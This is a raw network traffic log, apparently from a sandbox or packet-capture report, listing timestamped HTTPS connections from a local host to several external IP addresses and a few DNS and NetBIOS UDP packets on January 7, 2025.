                                                                Jan 7, 2025 22:36:06.503808022 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.503814936 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.503873110 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.503900051 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.503907919 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.503935099 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.504550934 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.504621983 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.504648924 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.504657030 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.504686117 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.505201101 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.505250931 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.505271912 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.505279064 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.505305052 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.505367041 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.505462885 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.505471945 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.505563021 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.541585922 CET4434973835.190.80.1192.168.2.16
                                                                Jan 7, 2025 22:36:06.541666031 CET4434973835.190.80.1192.168.2.16
                                                                Jan 7, 2025 22:36:06.541831970 CET49738443192.168.2.1635.190.80.1
                                                                Jan 7, 2025 22:36:06.542190075 CET49738443192.168.2.1635.190.80.1
                                                                Jan 7, 2025 22:36:06.542211056 CET4434973835.190.80.1192.168.2.16
                                                                Jan 7, 2025 22:36:06.593488932 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.593533993 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.593563080 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.593574047 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.593606949 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.593661070 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.593776941 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.593785048 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.593831062 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.593879938 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.593888044 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.594008923 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.594125986 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.594182968 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.594260931 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.594327927 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.594508886 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.594602108 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.594631910 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.594639063 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.594690084 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.594883919 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.595063925 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595098019 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595120907 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.595127106 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595153093 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595155954 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.595170021 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595225096 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.595225096 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.595232964 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595352888 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.595896006 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595937014 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595966101 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595967054 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.595977068 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.595990896 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.596005917 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.596035004 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.596045971 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.596075058 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.596090078 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.596232891 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.596232891 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.600965977 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.600994110 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.602282047 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.602550030 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.602565050 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:06.905080080 CET49737443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:06.905112982 CET44349737104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.021383047 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.021441936 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.021763086 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.021763086 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.021802902 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.087032080 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.087326050 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.087353945 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.087687016 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.088027954 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.088093042 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.088118076 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.131345987 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.142507076 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.244906902 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.244983912 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.246208906 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.246208906 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.475811958 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.476164103 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.476203918 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.476532936 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.476844072 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.476921082 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.477719069 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.519335032 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.563951015 CET49739443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.563982964 CET44349739104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.611278057 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.611365080 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.611419916 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.616508007 CET49740443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.616524935 CET44349740104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.629677057 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.629724979 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:07.629818916 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.631321907 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:07.631333113 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.214612961 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.214665890 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.214831114 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.215121031 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.215135098 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.336939096 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.337218046 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.337246895 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.337577105 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.337928057 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.337989092 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.338061094 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.383332014 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.487467051 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.487535954 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.487581968 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.488226891 CET49741443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.488245010 CET44349741104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.783054113 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.783339024 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.783365965 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.783699036 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.784008026 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.784075975 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.784142971 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.831326008 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.908937931 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.909014940 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.909068108 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.909095049 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.909110069 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.909168959 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.909657001 CET49742443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.909672976 CET44349742104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.960917950 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.960972071 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:08.961045980 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.961278915 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:08.961297989 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.434246063 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.434586048 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.434604883 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.434931993 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.435231924 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.435292006 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.435379028 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.435448885 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.435461044 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.435539961 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.435564041 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.697846889 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.697890997 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.697920084 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.697945118 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.697947979 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.697962999 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.697982073 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.697988987 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.698018074 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.698024988 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.698031902 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.698066950 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.698283911 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.698395014 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.698421955 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.698434114 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.698441029 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.698477030 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.702528954 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.747963905 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.788223028 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788274050 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788305998 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788333893 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788388968 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.788419008 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788431883 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.788897038 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788924932 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788954020 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.788961887 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.788992882 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.789001942 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.789036989 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.789056063 CET49743443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.789068937 CET44349743104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.791611910 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.791668892 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:09.791755915 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.792006016 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:09.792026997 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.258117914 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.258440018 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:10.258475065 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.259618998 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.259943008 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:10.260078907 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:10.260101080 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.260135889 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.306993961 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:10.398123980 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.398359060 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:10.398431063 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:10.398710966 CET49744443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:10.398734093 CET44349744104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.447906017 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.447987080 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.448107958 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.448349953 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.448369026 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.919207096 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.919828892 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.919842958 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.920169115 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.920588017 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.920648098 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.920895100 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.920941114 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.920944929 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.920983076 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.921008110 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.921010017 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.921019077 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:29.921067953 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:29.921129942 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.191351891 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.191423893 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.191452980 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.191468954 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.191478968 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.191497087 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.191513062 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.191566944 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.191617966 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.192480087 CET49764443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.192495108 CET44349764104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.195362091 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.195403099 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.195472956 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.195724010 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.195740938 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.268485069 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:30.268522978 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:30.268584967 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:30.268798113 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:30.268811941 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:30.661079884 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.661374092 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.661398888 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.661722898 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.662019014 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.662082911 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.662144899 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.707338095 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.726509094 CET49769443192.168.2.1613.107.246.254
                                                                Jan 7, 2025 22:36:30.726537943 CET4434976913.107.246.254192.168.2.16
                                                                Jan 7, 2025 22:36:30.726610899 CET49769443192.168.2.1613.107.246.254
                                                                Jan 7, 2025 22:36:30.726890087 CET49769443192.168.2.1613.107.246.254
                                                                Jan 7, 2025 22:36:30.726901054 CET4434976913.107.246.254192.168.2.16
                                                                Jan 7, 2025 22:36:30.764369011 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:30.765180111 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:30.765199900 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:30.766155958 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:30.766217947 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:30.770503044 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:30.770566940 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:30.770665884 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:30.770673990 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:30.802670956 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.802747965 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.802824020 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.803225040 CET49767443192.168.2.16104.18.95.41
                                                                Jan 7, 2025 22:36:30.803234100 CET44349767104.18.95.41192.168.2.16
                                                                Jan 7, 2025 22:36:30.826060057 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:31.341846943 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:31.341953993 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:31.342025042 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:31.343022108 CET49768443192.168.2.16172.67.166.74
                                                                Jan 7, 2025 22:36:31.343040943 CET44349768172.67.166.74192.168.2.16
                                                                Jan 7, 2025 22:36:31.389631987 CET4434976913.107.246.254192.168.2.16
                                                                Jan 7, 2025 22:36:31.389714003 CET49769443192.168.2.1613.107.246.254
                                                                Jan 7, 2025 22:36:31.454301119 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.454335928 CET44349774104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:31.454421043 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.454746962 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.454761982 CET44349774104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:31.914144039 CET44349774104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:31.914411068 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.914446115 CET44349774104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:31.915458918 CET44349774104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:31.915534973 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.915903091 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.915903091 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.915956974 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.915968895 CET44349774104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:31.916068077 CET49774443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.916254044 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.916284084 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:31.916363001 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.916564941 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:31.916575909 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.398932934 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.400199890 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:32.400237083 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.401319027 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.401396036 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:32.401855946 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:32.401918888 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.401976109 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:32.401981115 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.452402115 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:32.969621897 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.969724894 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:32.969832897 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:32.970474958 CET49775443192.168.2.16104.21.42.208
                                                                Jan 7, 2025 22:36:32.970493078 CET44349775104.21.42.208192.168.2.16
                                                                Jan 7, 2025 22:36:36.113739967 CET4434976913.107.246.254192.168.2.16
                                                                Jan 7, 2025 22:36:36.113893032 CET49769443192.168.2.1613.107.246.254
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 7, 2025 22:34:49.339667082 CET6517953192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:35:01.829521894 CET6120153192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:35:15.859477997 CET5496653192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:35:43.387064934 CET138138192.168.2.16192.168.2.255
                                                                Jan 7, 2025 22:35:58.506269932 CET4986253192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:35:58.506778002 CET5493753192.168.2.161.1.1.1
